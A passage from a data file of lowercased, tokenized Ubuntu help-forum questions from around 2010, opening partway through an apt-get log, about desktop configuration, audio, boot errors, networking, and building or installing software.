translation-en ign http : //im.archive.ubuntu.com/ubuntu/ maverick-updates/restricted translation-en_us ign http : //im.archive.ubuntu.com/ubuntu/ maverick-updates/universe translation-en ign http : //security.ubuntu.com/ubuntu/ maverick-security/main translation-en_us ign http : //security.ubuntu.com/ubuntu/ maverick-security/multiverse translation-en ign http : //security.ubuntu.com/ubuntu/ maverick-security/multiverse translation-en_us ign http : //im.archive.ubuntu.com/ubuntu/ maverick-updates/universe translation-en_us hit http : //im.archive.ubuntu.com maverick-proposed release.gpg ign http : //im.archive.ubuntu.com/ubuntu/ maverick-proposed/main translation-en ign http : //im.archive.ubuntu.com/ubuntu/ maverick-proposed/main translation-en_us ign http : //im.archive.ubuntu.com/ubuntu/ maverick-proposed/multiverse translation-en ign http : //im.archive.ubuntu.com/ubuntu/ maverick-proposed/multiverse translation-en_us ign http : //im.archive.ubuntu.com/ubuntu/ maverick-proposed/restricted translation-en ign http : //security.ubuntu.com/ubuntu/ maverick-security/restricted translation-en ign http : //security.ubuntu.com/ubuntu/ maverick-security/restricted translation-en_us ign http : //security.ubuntu.com/ubuntu/ maverick-security/universe translation-en ign http : //security.ubuntu.com/ubuntu/ maverick-security/universe translation-en_us hit http : //security.ubuntu.com maverick-security release ign http : //im.archive.ubuntu.com/ubuntu/ maverick-proposed/restricted translation-en_us ign http : //im.archive.ubuntu.com/ubuntu/ maverick-proposed/universe translation-en ign http : //im.archive.ubuntu.com/ubuntu/ maverick-proposed/universe translation-en_us get:4 http : //im.archive.ubuntu.com maverick release [ 57.3kb ] hit http : //security.ubuntu.com maverick-security/main sources hit http : //security.ubuntu.com maverick-security/restricted sources hit http : //security.ubuntu.com maverick-security/universe sources hit http : //security.ubuntu.com maverick-security/main i386 packages hit http : //security.ubuntu.com maverick-security/restricted i386 packages hit http : //security.ubuntu.com maverick-security/multiverse i386 packages hit http : //security.ubuntu.com maverick-security/universe i386 packages get:5 http : //ppa.launchpad.net maverick/main sources [ 3,051b ] get:6 http : //ppa.launchpad.net maverick/main i386 packages [ 6,396b ] hit http : //im.archive.ubuntu.com maverick-updates release hit http : //im.archive.ubuntu.com maverick-proposed release get:7 http : //im.archive.ubuntu.com maverick/main sources [ 829kb ] get:8 http : //im.archive.ubuntu.com maverick/restricted sources [ 4,361b ] get:9 http : //im.archive.ubuntu.com maverick/universe sources [ 4,186kb ] get:10 http : //im.archive.ubuntu.com maverick/main i386 packages [ 1,491kb ] get:11 http : //im.archive.ubuntu.com maverick/restricted i386 packages [ 6,000b ] get:12 http : //im.archive.ubuntu.com maverick/multiverse i386 packages [ 183kb ] get:13 http : //im.archive.ubuntu.com maverick/universe i386 packages [ 5,786kb ] hit http : //im.archive.ubuntu.com maverick-updates/main sources hit http : //im.archive.ubuntu.com maverick-updates/restricted sources hit http : //im.archive.ubuntu.com maverick-updates/universe sources hit http : //im.archive.ubuntu.com maverick-updates/main i386 packages hit http : //im.archive.ubuntu.com maverick-updates/restricted i386 packages hit http : //im.archive.ubuntu.com maverick-updates/multiverse i386 packages hit http : //im.archive.ubuntu.com maverick-updates/universe i386 packages hit http : //im.archive.ubuntu.com maverick-proposed/restricted i386 packages hit http : //im.archive.ubuntu.com maverick-proposed/main i386 packages hit http : //im.archive.ubuntu.com maverick-proposed/universe i386 packages hit http : //im.archive.ubuntu.com maverick-proposed/multiverse i386 packages fetched 12.6mb in 7min 54s ( 26.6kb/s ) reading package lists ... done if anyone can help i would be massively appreciative of that will
5157	how do i correctly disable a mac-style application menu in classic desktop edition ?	i installed `` indicator-applet-appmenu '' and tried the same for `` global menu '' . it does not work for the most of applications and does not seem convenient with my monitors configuration . the problem is , that now ( despite i have no `` appmenu applet '' active ) , some applications , for example uex ( ultraedit for linux ) do n't show their menus in their windows , so i need to activate global menu applet to use them . how can i fix this ? i am afraid ( because i am on a 3g connection with limited traffic ) that if i just remove indicator-applet-appmenu package , the problem wo n't solve and i will loose the last way to access menus in those programs .
5161	how to disable windows ' contents to be moved on dragging , so that only a frame is draggend and a window is obly redrawed on drop ?	how to disable windows ' contents to be moved on dragging , so that only a frame is draggend and a window is obly redrawed on drop ? in windows , kde and xfce this can be easily configured , but in gnome ( ubuntu 10.10 ) i could n't find where to set this up : - (
5169	pulseaudio playing surround through headset	i am using xubuntu 10.04 , and i am having issues with the sound . first things just sounded strange , then i figured out that i am actually getting the surround left and surround right sound in my headset . if i change the balance in aumix to either far left or far right , things sound better . i still get sound in both headphones , but only the left or right channel . if i do speaker-test -c6 , it becomes clear that i am missing the center channel . in /etc/pulse/daemon.conf i have set default-sample-channels = 2 is there a way for pulseaudio to downmix from surround to stereo for the ouptut ?
5170	apt-build & chromium ppa	i 'd like to build an ( optimized ) version of chromium for my machine with apt-build on ubuntu 10.04 . i 've added a chromium-ppa to my /etc/sources.list.d/ like this : deb http : //ppa.launchpad.net/chromium-daily/stable/ubuntu lucid main deb-src http : //ppa.launchpad.net/chromium-daily/stable/ubuntulucid main but if i run sudo apt-build install chromium browser it tells me chromium-browser will not be built because it does n't have a source package . missing source package name for source_by_source ( ) . on the other hand sudo apt-get source chromium-browser seems to work fine , even downloads the 6.x from the ppa what am i doing wrong ? building ffmpeg and firefox via apt-build worked like a breeze . except that my preferred chromium is from a ppa i do n't see a difference .
5172	running a .desktop file in the terminal	from what i can gather , .desktop files are shortcuts that allow application 's settings to be customized . for instance , i have lots of them in my /usr/share/applications/ folder . if i open that folder in nautilus , i can run these applications just by double clicking its associated file , e.g . double-clicking firefox.desktop runs firefox . however , i ca n't find a way to do the same thing via terminal . if i do gnome-open foo.desktop it simply opens foo.desktop as a text file . if i make it exectuable and then run it in bash it simply fails ( which is expected , it 's clearly not bash script ) . edit : doing exec /fullpath/foo.desktop gives me a `` permission denied '' message , even if i change ownership to myself . if i make executable and do the same command , the terminal tab i 'm using simply closes ( i 'm guessing it crashes ) . finally , if i do sudo exec /fullpath/foo.desktop , i get an error reporting `` sudo : exec : command not found '' . that 's my question , how can i run a foo.desktop file from the terminal ?
5178	dependency cycle upgrading to 10.04 lts	i 've got the following error while attempting to upgrade from 8.04 to v 10.04 . is there anything i can do to resolve the issue ? upgrading ubuntu to version 10.04 lts could not install the upgrades error during commit 'e : could n't configure pre-depend jre for openoffice.org-writer2latex , probably a dependency cycle . ' restoring original system state
5181	laptop shuts down on lid close	when i close the lid of my asus x77jq , lucid shuts it down automatically after five minutes . i want to be able to sleep in the same room as my laptop , so i would like to be able to close the lid without it shutting down . how can i do this ? the power options lid close option is set to do nothing .
5186	xrandr reports external vga output connected even with no cable attached	i have a machine running karmic which is embedded in a large screen . when i run xrandr -q , it reports that the vga output is connected , even when there is no screen attached . this is causing some issues with other resolution-related software ( that i ca n't change at the moment ) . is there a way to disable the vga output so that it does n't show up at all , or is there some fix i can backport so that it no longer reports incorrectly ? some info on the system is below . as far as i can tell it happens only on this hardware . xrandr screen 0 : minimum 320 x 200 , current 1360 x 864 , maximum 4096 x 4096 vga connected 1360x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1360x768 59.8* 1152x864 60.0 1024x768 60.0 800x600 60.3 640x480 59.9 lvds connected 1152x864+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1920x1080 60.0 + 1680x1050 84.9 74.9 69.9 60.0 1600x1024 60.2 1400x1050 85.0 74.8 70.0 60.0 1280x1024 85.0 75.0 60.0 1440x900 59.9 1280x960 85.0 60.0 1360x768 59.8 1152x864 100.0 85.1 85.0 75.0 75.0 70.0 60.0* 1024x768 85.0 75.0 70.1 60.0 832x624 74.6 800x600 85.1 72.2 75.0 60.3 56.2 640x480 85.0 72.8 75.0 59.9 720x400 85.0 640x400 85.1 640x350 85.1 tv disconnected ( normal left inverted right x axis y axis ) lspci 00:02.0 vga compatible controller : intel corporation mobile gme965/gle960 integrated graphics controller ( rev 03 ) subsystem : micro-star international co. , ltd. device 8030 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 27 region 0 : memory at fe900000 ( 64-bit , non-prefetchable ) [ size=1m ] region 2 : memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] region 4 : i/o ports at c000 [ size=8 ] capabilities : [ 90 ] message signalled interrupts : mask- 64bit- queue=0/0 enable+ address : fee0100c data : 4191 capabilities : [ d0 ] power management version 3 flags : pmeclk- dsi+ d1- d2- auxcurrent=0ma pme ( d0- , d1- , d2- , d3hot- , d3cold- ) status : d0 pme-enable- dsel=0 dscale=0 pme- bridge : pm- b3+ kernel modules : i915 00:02.1 display controller : intel corporation mobile gme965/gle960 integrated graphics controller ( rev 03 ) subsystem : micro-star international co. , ltd. device 8030 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 region 0 : memory at fe800000 ( 64-bit , non-prefetchable ) [ size=1m ] capabilities : [ d0 ] power management version 3 flags : pmeclk- dsi+ d1- d2- auxcurrent=0ma pme ( d0- , d1- , d2- , d3hot- , d3cold- ) status : d0 pme-enable- dsel=0 dscale=0 pme- bridge : pm- b3+
5187	why is dhclient saying : `` siocsifaddr : permission denied '' ?	i have encountered a very weird error on ubuntu-server ( 8.04 ) , i have no idea why dhclient is not allowed to set the network settings ! i 'm not the one who installed the server in the first place , so i do n't know much about the setup . the server is only used as a firewall/gateway ( custom iptables script ) it 's got three nic 's one for internet , one for lan and one for dmz . now the isp have changed settings from static ip to `` static '' ip assigned through dhcp , and i cant really use it . sadly i ca n't just set the ip statically since the isp closes my connection when the dhcp lease ends : o this is the error i get : ( and then it just hangs there.. ) root @ fw : ~ # dhclient eth2 internet systems consortium dhcp client v3.0.6 copyright 2004-2007 internet systems consortium . all rights reserved . for info , please visit http : //www.isc.org/sw/dhcp/ siocsifaddr : permission denied siocsifflags : permission denied siocsifflags : permission denied listening on lpf/eth2/00:50:52 : c1 : a1:32 sending on lpf/eth2/00:50:52 : c1 : a1:32 sending on socket/fallback dhcpdiscover on eth2 to 255.255.255.255 port 67 interval 8 dhcpoffer of 2.10.56.19 from 93.87.36.42 dhcprequest of 2.10.56.19 on eth2 to 255.255.255.255 port 67 dhcpack of 2.10.56.19 from 93.87.36.42 siocsifaddr : permission denied siocsifflags : permission denied siocsifnetmask : permission denied siocsifbrdaddr : permission denied siocsifflags : permission denied siocaddrt : operation not permitted for now i 've fixed it by running killall dhclient ; dhclient eth2 every hour and then setting static ip settings for the interface , this is enough to keep the connection live ! but it 's a pretty ugly hack in my opinion..
5190	remove locale from the system	for some obscure reason , my /var/lib/locales/supported.d/local file contained an extra locale that typically should not be there ( in my example , pl_pl.utf-8 utf-8 ) . i ran sudo dpkg-reconfigure locales , and the system reported : generating locales ... el_gr.utf-8 ... up-to-date en_dk.utf-8 ... up-to-date en_us.utf-8 ... up-to-date generation complete . that is , it verified that the rest of the locales are up-to-date ; however , there was no mention of the pl_pl.utf-8 locale . i do n't know if it erased files related to the locale . how can i make sure that there are no files left in the system for the pl_pl.utf-8 locale ?
5192	is there a way to limit the bandwidth that software center uses ?	whenever i am downloading packages using ubuntu software center ( or any package manager for that matter ) , my internet connection slows to an absolute crawl . in fact , most requests timeout . is there a way to limit the bandwidth that software center uses when downloading packages ?
5196	replace default local font	could someone tell me how to replace system default localization font ? i mean when it time to render my language i want to use specific font instead of the one ubuntu choice for me . thz
5198	what is the best way to shrink hd quicktime mov files	i recently purchased one of the kodak playsport cameras which takes 720p video @ 60 frames per second . the video quality is great but the files are rather large for uploading to youtube ( about 150 megs per minute of video ) . the files are output as quicktime mov files . my question is : is there a command line tool that allows me to shrink the video down to a lower resolution/size for quicker uploading ? i 'm thinking something like imagemagick 's convert but for video . thanks , alex
5200	how can i automatically run a command when i log out ?	i 'd like to make a command run every time i log out . is there a way to do this ?
5203	what happens if i delete the default folders in my home folder ?	what are the consequences of deleting any of these ? e.g . : how will applications that expect them to be present behave ? where will the items on my desktop go ?
5209	how do i change the folder icons in the `` places '' menu ?	how do i change to icons in here ?
5212	can i transparently compress some files on a samba share	we are running an ubuntu server which is a primary domain controller for several windows xp clients using samba . some of our processes running on windows generate huge amounts of xml files . unfortunately we do not have any influence on how this data is stored ( e.g . we can not change the programs to ( un ) gzip the xml files when they are loaded/saved , they are provided by a 3rd party and we are required to use these programs by contract ) . since our hard disks are overflowing regularly i wonder whether there is such a thing like ntfs compression for ubuntu/linux for compressing these files transparently for the clients . some more background : processing these files always means that they are read completely into memory , changed there and written back . only one client will access a directory of these files at a time so there are no concurrency and locking issues . the server already has 4x 2tb data drives . there is no more physical space to add more ( and i would like to avoid adding more disks ) the data must be kept active for about two years , after that it will be archived and deleted from the disks . i think the perfect solution would be some kind of plug in to the samba server that gets called whenever a file which matches a given wildcard / regex is created / written or read which uses gzip / ungzip to compress / uncompress the file on the fly . alternatively i could imagine a windows file system driver that does the same on the client side . i would like to avoid any manual steps in this process because it is too error prone . is there something like this ? i have already used google but could not find any solution . ( i would have liked to create a compression tag for this but i am not allowed to do that yet . )
5215	empathy does n't seem to be saving my display picture	hey how do i force empathy to save my display pic ? i have tried to set it ( in different formats and sizes ) over a dozen times , all i get is this little silver man .
5218	where is the order of names in gdm login screen stored ?	where is the users ' login history stored that governs the order in which the users ' names appear in the login window ? background : i want to manipulate the order of the names . -- [ [ this is the most counter-intuitive forum site i have dealt with yet . ] ]
5224	gui sudo not working ?	i accidentally screwed up the groups for my main user by doing sudo usermod -g blah instead of sudo usermod -a -g blah . on realising this , i immediately rebooted into single user mode and added the groups adm dialout cdrom floppy fuse to the user 's account . everything seemed to be more or less back to normal and i could sudo as usual on the command line . however , the authentication dialog box that shows up in the gui has stopped working for nearly all programs . the dialog shows up as normal , but will not accept the password . gksudo firefox from the command-line seems to work , as does synaptic , leading me to believe that i 'm merely missing a group that the other ubuntu configuration/admin apps check for . any solutions would be much appreciated .
5227	load images by default for html emails in evolution	it seems that each time i go to open an html message in evolution i have to goto view - > load images . is there a way to change this so images will be automatically downloaded each time i receive an html message ?
5228	how do i fix an 'unknown key ' issue so the key works as expected ?	several special keys , most importantly the 'eject ' button , are not working on my keyboard . the only way i can eject my dvd drive is by opening up a terminal and typing 'eject ' . when i press the eject button on my keyboard it gives the following message in the logs so it is registering the button being pressed but it is not doing anything . also it does n't register this message in the logs everytime i press the eject button , only occasionally . -laptop kernel : [ 1335.617380 ] atkbd.c : unknown key released ( translated set 2 , code 0xf8 on isa0060/serio0 ) . -laptop kernel : [ 1335.617384 ] atkbd.c : use 'setkeycodes e078 < keycode > ' to make it known . does anyone know how i should go about fixing my keyboard so that all my special keys like eject work ? i installed keytouch and keytouch editor but when it asks me to press the 'eject ' button it still does n't notice that i pressed it so i can not assign it to the xf86eject function . its a packard bell easynote tx86 and i 'm running lucid lynx . any ideas ?
5229	how can i bind a key to cycle between workspaces ?	i 'm using 2 workspaces right now , and i 'd like to be able to cycle through them using a single shortcut . at the moment , i can do ctrl+alt+right to switch to workspace 2 , and left switches to 1 , but i 'd like a single key ( or key combination ) to switch to the workspace i 'm not in right now . that way i would only need that shortcut , and not need two . i 'm running ubuntu on an old machine , and that keeps me from enabling compiz at all . i tried writing a script using both wmctrl and xdotool , but neither work properly ( no matter what i do , they both will only switch to workspace 1 , and never to 2 ) . any suggestions ?
5230	how can i let users in a particular group adjust cpu frequency scaling ?	i 'm trying to let members of the group labmembers adjust the cpu frequency scaling on a system using cpufreq-selector . however , by default , this is restricted to members of the admin group . per this question , i 've created the following file : /etc/polkit-1/localauthority/30-site.d $ cat 50-cpufreq.pkla [ cpu frequency should be allowed for everyone ] adminidentities=unix-group : labmembers action=org.gnome.cpufreqselector resultactive=yes resultinactive=yes however , it seems to have no effect . i ca n't find any command to reload policykit 's configuration , and rebooting does n't do it either . i 've also tried naming it 50-cpufreq.conf , to no more effect . there 's nothing i 've found that would tell me whether a pkla file is well-formed or anything like that , either . what am i missing ?
5238	recommended laptop models for ubuntu 10.04 ( lucid )	i am thinking of purchasing a new laptop computer and will be installing ubuntu lucid desktop ( either 64-bit or 32-bit ) on it . what models can you recommend ?
5241	ubuntu : `` editable menu accelerators '' ( on a per app basis ) . where is this option ?	i keep seeing references to a config option calld editable menu accelerators or editable menu shortcut keys . this is exactly what i need , but all the directions i 've read about how to find that feature lead me to a dead-end . i am running with ubuntu 10.4 , and have checked its help file desktop user guide . in section 8.2.1.4.窶オnterface preferences it says : '' ... the interface tabbed section in the appearance preference tool to customize the appearance of menus , menubars , and toolbars for applications that are part of gnome . '' this interface tab does not exist in ubuntu 10.4 ( ... okay , who moved it ? ! .. where is i ? ) is this feature still available ? i assume it does exist , and is now accessible some other way ... but how ? ps : to clarify ... i want to modify a menu-item accelerator for a specific app ( not a system-wide hot-key )
5245	how to format drives in kubuntu ?	in ubuntu , formatting drives is a simple process : simply select it and tell ubuntu what you want done with it . my question is ; is there any tool as easy as that for kubuntu ?
5249	can i set up gnome terminal to have a toolbar ?	in xfce i used to like a terminal window to have a toolbar ( with cut , copy , paste and new tab buttons ) . can i enable it in gnome terminal ?
5250	grub boot error : `` the second sector of stage 2 is unknown ''	while booting , i am getting the error message internal error : the second sector of stage 2 is unknown . '' this is under ubuntu 10.04 lucid lynx . after posting , the full text of the grub loading screen is : grub loading stage1.5 grub loading , please wait ... . internal error : the second sector of stage 2 is unknown . this is an existing install that has been working for a long time . i came home to find the computer powered but not responding with no input to the monitor . upon rebooting , this error message was displayed .
5251	how to add/remove buttons to nautilus toolbar ?	i 'd like to add some buttons ( such as cut , copy , paste , new folder , open terminal in current folder ) to nautilus toolbar . can i ? and it 'd be awesome if i could add custom buttons running commands i specify , and perfect if i could use macros ( like current selected file full name substitution etc . ) in those commands .
5252	in nautilus is there hot-key to the side-pane 's drop-down mode-selection list ( place , tree , etc ) ?	in nautilus , i sometimes want to change the mode of the side-pane ( tree , places , etc ) . this can be done via the a mouse click on the drop button at the top of the side-pane . ... but there is no hot-key/accelerator-key to quickly display this drop-list . i usually prefer the keyboard for basic navigation , and this lack of simple keyboard navigation is a pain in the proverbial . if there were even a menu item to jump across to the side-pane , it would n't be such a pain ( bad pun ) ... and i could just set the menu-item 's accelerator key ... but there is n't such a menu item ! can i create a menu-item for this particlar chore ? or , is there already a hot-key for this ? ( jumping directly across to the side-pane would be enough . dropping the list is ideal ) ctrl+tab does some sort of navigation , but it seems to stop at every control on its route , and this results in a varying number of whistle-stops , depending on the state of the rest of the window ( eg . extra pane , expanded trees ... )
5253	web is very slow after upgrading to ubuntu 10.04	i have a dell inspiron 1525 with was shipped with ubuntu 8.04 . it was working ok . i 've decided to move to ubuntu 10.04 last week . the install process was ok . unfortunately , after the upgrade , my web access became very unstable . i can see web pages in firefox but it is very slow and i have a lot of errors . i 've checked the network and firefox settings all seems ok . does anybody know this problem ? how can i investigate further ?
5256	display resolution problem using vga splitter	hardware i have the following hardware configuration : pc running ubuntu 10.04 onboard video card with one vga output ( intel p4m800 - via unichrome ) vga splitter : 1 input , 4 outputs . up to 2048x1536 ( according to spec ) one 42 '' tv/monitor connected to the splitter via its vga input two 32 '' tv/monitor connected to the splitter via its vga input problem with that configuration , ubuntu only shows 640x480 and 800x800 as possible resolutions . however , if i connect any of the tv/monitor directly to the pc ( via vga ) then ubuntu shows a long list of possible resolution ( i tried several of them and they worked fine ) . it seems that x window system automatic configuration is not working properly . how do i manually configure it ? what info should knows of the different devices involved beforehand ? context : the monitors are intalled in public spaces across one building to display dynamic information that is processed in the pc ( a flash presentation running in firefox in fullscreen mode ) . update : i tried the following , as the link provided in the answers said : get the modeline for the resolution using cvt created the new mode using xrandr -- newmode added the mode to the output display using xrandr -- addmode tried to change the resolution using xrandr -- output ... -- mode ... but i get this : xrandr screen can not be larger than 800x600 ( desired size ... )
5257	is there a rational reason to wait for the release date to download , install or update to the next version of ubuntu ?	today , october 6th 2010 , ubuntu 10.10 is in feature definition freeze , debian import freeze , feature freeze , user interface freeze , beta freeze , documentation string freeze , final freeze , kernel freeze and past the translation deadlines in both the non-language pack and language pack editions as the release schedule details . basically , except for last minute bugfixes , the version of ubuntu 10.10 you can download today is identical to the version of ubuntu 10.10 you can download on the 10th when it gets released . if you downloaded and installed ubuntu 10.10 today , you would : help find glaring issues for last minute fixing help defray the network load on october 10th see ubuntu 10.10 in action without waiting those sound like pretty strong arguments ... to me , and indeed i 've been using ubuntu 10.10 for a month now roughly . however , most people prefer to make the jump with everybody else on release day . what are the rational reasons for that ?
5264	how do i set up automatic login ?	how do i get 10.04 ( lucid ) to log me in automatically on each reboot ?
5265	single mouse clicks behaving as double clicks ?	some time ago i started experiencing strange issue when single clicks would intermittently act as double clicks . replacing the mouse does n't help . ubuntu forum seems to have few threads related to this ( this , and this and few more ) with no definitive solution . hence my question - maybe someone here will be able to help me solve this mystery ?
5270	i want my panel clock to be `` digital '' ( 2011-01-01 ) . is there a setting , or another clock ?	i 've been using computers for too long . the `` human '' display of the date/time in the panel looks a bit strange to me these days . i am quite happy with the more functional and sortable digits-and-dots-and-dashes approach . give me yyyy-mm-dd hh.nn.ss any day ! ( with leading zeroes ) i am a recent refugee from land of windows , where one consolation was a nice tray clock ( tclockex ) which had free-form layouts for both the tray-display and the copy-to-clipboard . although i like the general features of the standard-issue clock , i really do want a free-form digital clock ( preferably with clipboard-out ) ... and my calendar week starts on monday ( not sunday , as per the panel-clock ) i often need a sortable digital date/time prefix for file names . the clock is handy for this . can the standard ubuntu clock do this ? i could n't find anything . ... or is there another clock which can ?
5273	how do you view the contents of a .cab file ?	i 'll trying to migrate away from simply accounting and need to somehow extract the contents of a windows cab file which is what simply uses for backups . what is the best way to open a cab file on ubuntu ?
5282	use computer headset like a hands-free for cell phone	is it possible ( and how ) to use a computer headset ( or speakers+mic ) as a hands-free device for my mobile ? i bought a bluetooth-dongle but i could n't get it to work yet . i think i already set this up on an older version of ubuntu on my laptop . i 'm using ubuntu 10.10 , the phone is an android 2.2 ( but i think this does n't matter ) and the bluetooth device is a integrated system solution corp. bluetooth device ( according to lsusb ) . output of lsusb -v edit : i found a project that seams to do just what i want : http : //nohands.sourceforge.net . i tried to install it on my laptop but it did n't work . i 'll try it again on my computer at home and post a description as soon as it works ( or any of you guys could post a solution if you 're faster ; ) edit2 : i was able to connect my phone , but somehow the audio does n't work . i think the program has troubles with pulseaudio , as the soundtest fails . any ideas ? edit3 : i 'm still trying to get this to work . i might buy another bluetooth dongle . atm i 'm able to dial numbers in hfconsole - that 's all . somehow i 'm shure there is a way to get this to work !
5283	is there a way to make text in the interface sharper like windows ?	i noticed on every install of ubuntu , the font is softer than on windows . is this a setting somewhere ?
5284	how to call a number from command-line with skype ?	i 've seen several links suggesting it is possible to make a call from the command-line with skype . the instructions suggest something along the lines of : skype -- callto : +14445551234 however , this gets me an error message , `` skype : unrecognized option ' -- callto : +14445551234 '' . is this possible ? use case scenario : i want to call a particular number frequently . assuming skype client is already running and logged in . i create a shortcut on my desktop , which runs skype -- callto : +14445551234 or something similar . double-click the shortcut . skype window pops up , immediately calling this number can this be done ? i know there is a skype api . can this be done from a normal skype installation on ubuntu , without installing any developer tools ? edit : i am considering this question to be still open , because i would like to know if this is possible from a default installation of skype without any additional functionality . however , the answer below regarding `` skype4py '' does answer the desired outcome , albeit with an additional tool . i will mark this as the answer if another is not forthcoming in a few weeks .
5288	how can i evenly space icons in the panel ?	this is a silly , nitpicky little thing , but i have a laptop with a less-than-desirable amount of screen real estate , so it bothers me . i 've added a bunch of application launchers to the default panel at the top of my screen ( to the right of the applications/places/system menus . ) the problem is , i ca n't seem to control the spacing of the icons - i have quite a bit of space available at the right of the panel , and i can drag each individual icon over , but it seems like each icon is attached to its neighbor to the right . so i move one over , and the next one comes with it . then i move that one , and the one to it 's left comes too . the end result is i have several clumps of very-closely-clustered icons , with a lot of space between each clump . is there any way to control the spacing automatically ? snap to grid , auto-space , anything ? because my screen is tiny and resolution is pretty high , each icon is very small , and when they 're so close together i sometimes end up clicking the wrong one . i 'm running lucid , and am open to installing things if there 's a package that would give me more control over the presentation . i 'm also relatively new to linux , so maybe there 's a setting i 'm missing somewhere in one of the preferences menus .
5290	how to reach a windows machine by hostname ?	i have always been under the impression that all i need to do in order to reach the windows machines on my network by their hostnames from ubuntu was do add the 'wins ' option to the 'hosts ' line in my /etc/nsswitch.conf file , but since i installed maverick ( from rc iso , new install ) that does n't work anymore . my system is currently configured with the following line : hosts : files mdns4_minimal [ notfound=return ] dns mdns4 wins any ideas ?
5291	how can i remove old content from syslog in system log viewer ?	when l look into ubuntu 's system log viewer ( i think that 's the name in english ) the messages categories are blown up with 70000 lines and almost 12mb in size . it mixes up messages from may this year and recent messages from the last few days . how can i remove the old messages from may ?
5292	playing drm encrypted wmv files in linux	how do i play drm encrypted wmv files in ubuntu ? if it is possible , how do i do it . i 've tried playing it with vlc and mplayer media player but does not work . i am getting a scrambled picture when i play it through vlc . any ideas ?
5294	text selection ctrl+shift+cursor keys ?	i 'm used to this windows behavior that using ctrl+shift+cursor keys i can select text word-wise . ctrl+cursor keys jumps word-wise and i use that a lot in combination with shift to select text . this seems to be a `` windows thing '' because it just works in all application . now turning to ubuntu 10.04 , it does n't work . ctrl+shift+cursor keys just behaves like ctrl+cursor keys , i.e . i jump between the words but i ca n't select them that way . another gotcha : i use ctrl+cursor keys to move fast between words , press down shift , release ctrl and move the cursor keys to select text char by char and it does n't work either . i need to release both keys complete . is there a way to enable this ?
5295	which programs are tweakable in gconf-editor ? and : what governs which ones end up there ?	i am happy that gconf-editor exists , and is readily accessible ( once you know about it ) , but it seems strange that there are two completely seperate places to customize an application 's look and feel . i am quite new to linux , and after two decades of windows , this `` new '' paradigm sometimes leaves me feeling like a lost and wandering pilgrim ... but i 've come to realize that i do n't need ms at all ( almost ; just one .net app i need/want ) ... and when i get mono installed in wine , i wo n't even need to run windows in a vm : ) ... but i actually get a perverse sense of happiness ( or is it revenge ) at seeing windows as the `` guest '' ... but i digress ... in the meantime , i want to understand how gnome is put together . what is the general design intent of gconf-editor '' ? where/how does it fit into the gnome world ? are all settings for a given app availble via gconf-editor ? is gconf-editor conceptually any/much different to the windows registry ? phew ! ...
5296	how to install windows media player 11 on wine	i am battling to install windows media player 11 on wine . i have tried the following : open a terminal ( applications , accessories , terminal ) and type `` sudo apt-get install wine . '' this installs wine windows emulator , a free application that allows you to run many windows programs within linux . download windows media player 11 for windows xp ( link in resources ) and save it to ubuntu 's desktop . once downloaded , right-click and select `` open with wine windows emulator . '' follow the on-screen prompts for installing it to your system . go to `` applications '' then `` wine , '' select `` programs '' and open `` windows media player . '' click `` file '' then `` open '' and locate a drm file you want to play . select `` ok '' to load it into media player . i installed wine ( which is step 1 ) . but i am having problems with step 2 ( download windows media player 11 for windows xp ( link in resources ) and save it to ubuntu 's desktop ) . i 'm just not finding a way to do it . i may be overlooking the ( link in resources ) ca n't find it . i am stuck !
5298	grub help and reinstalling ubuntu	recently , i installed ubuntu 10 netbook edition ( on my netbook , yes , obvious ) . my battery died literally , while i was using ubuntu . now , when i restart the computer , it seems that grub has duplicated all of the entries in the mbr that pertain to the partition that houses my ubuntu install . for example : ubuntu ... ubuntu ... ( recovery mode ) ubuntu ... ubuntu ... ( recovery mode ) memtest ... memtest ... windows ( vista loader ) windows ( windows 7 starter loader ) when i try to access either of the two ubuntu instances in the boot loader it presents me with an error akin to this : ... numbers ... kernel panic ... vfs unable to mount ... what i would like to do is : wipe out grub , and ubuntu , and then reinstall ubuntu ( i really only use it for emacs and ess for r so there 's nothing in the home directory that i need to backup ) how would i go about `` resetting '' my system ? or fixing the issue that i have . thanks in advance ! beb
5300	how to install tmux from source ?	i 've download tmux and am trying to install it on ubuntu 10.04 . $ ./configure configured for linux $ make cc -dbuild= '' \ '' 1.3\ '' '' -std=c99 -d_gnu_source -d_posix_source -iquote . -c -o attributes.o attributes.c in file included from attributes.c:23 : tmux.h:30:19 : error : event.h : no such file or directory in file included from attributes.c:23 : tmux.h:831 : error : field ‘name_timer’ has incomplete type tmux.h:1025 : error : field ‘key_timer’ has incomplete type tmux.h:1086 : error : field ‘event’ has incomplete type tmux.h:1102 : error : field ‘repeat_timer’ has incomplete type tmux.h:1122 : error : field ‘identify_timer’ has incomplete type tmux.h:1125 : error : field ‘message_timer’ has incomplete type make : *** [ attributes.o ] error 1
5304	upgrading to latest stable mono	mono 2.8 was recently released boasting a couple of large performance improvements . it 's far too late for it to make it into maverick and i 'm fairly inpatient . i do n't use mono for anything mission-critical ( just playing music and sorting photos ) and if it breaks everything related to mono , i can probably either live with it or fix it . i 'm aware of how much i stand to lose if i mess things up . so with that acknowledged , does anybody here know how to build mono in a way where it could be dropped in to replace the current mono ( 2.6.7 ) ? by this i mean ideally mirroring the packages that ubuntu uses so that if the worse does happen , i can just downgrade the packages . or is there a ppa that does all this for me ?
5306	can i set up two key-bindings to launch the main menu ? ... specifically : alt+f1 and super	i 've set up the super key to open the main menu . it works . gconftool-2 -- set /apps/metacity/global_keybindings/panel_main_menu -- type string `` super_l '' , i have a shell script super.sh which injects a super keypress into x . it works ; the menu appears . # ! /bin/bash echo `` keystrpress super_l keystrrelease super_l '' | xmacroplay -d 1 :0.0 & > /dev/null . i use xbindkeys to associate alt+f1 with super.sh . it should work , but it does n't ! however , when i associate alt+f1 with nautilus , or make nautilus the only active command in the script , then alt+f1 successfully launches nautilus ... so i am a bit puzzled about what 's happening to the script . any ideas , anybody ? if there is a another way , i 'd like to know about it , and i 'd still like to resolve this macro-generated key-press issue .
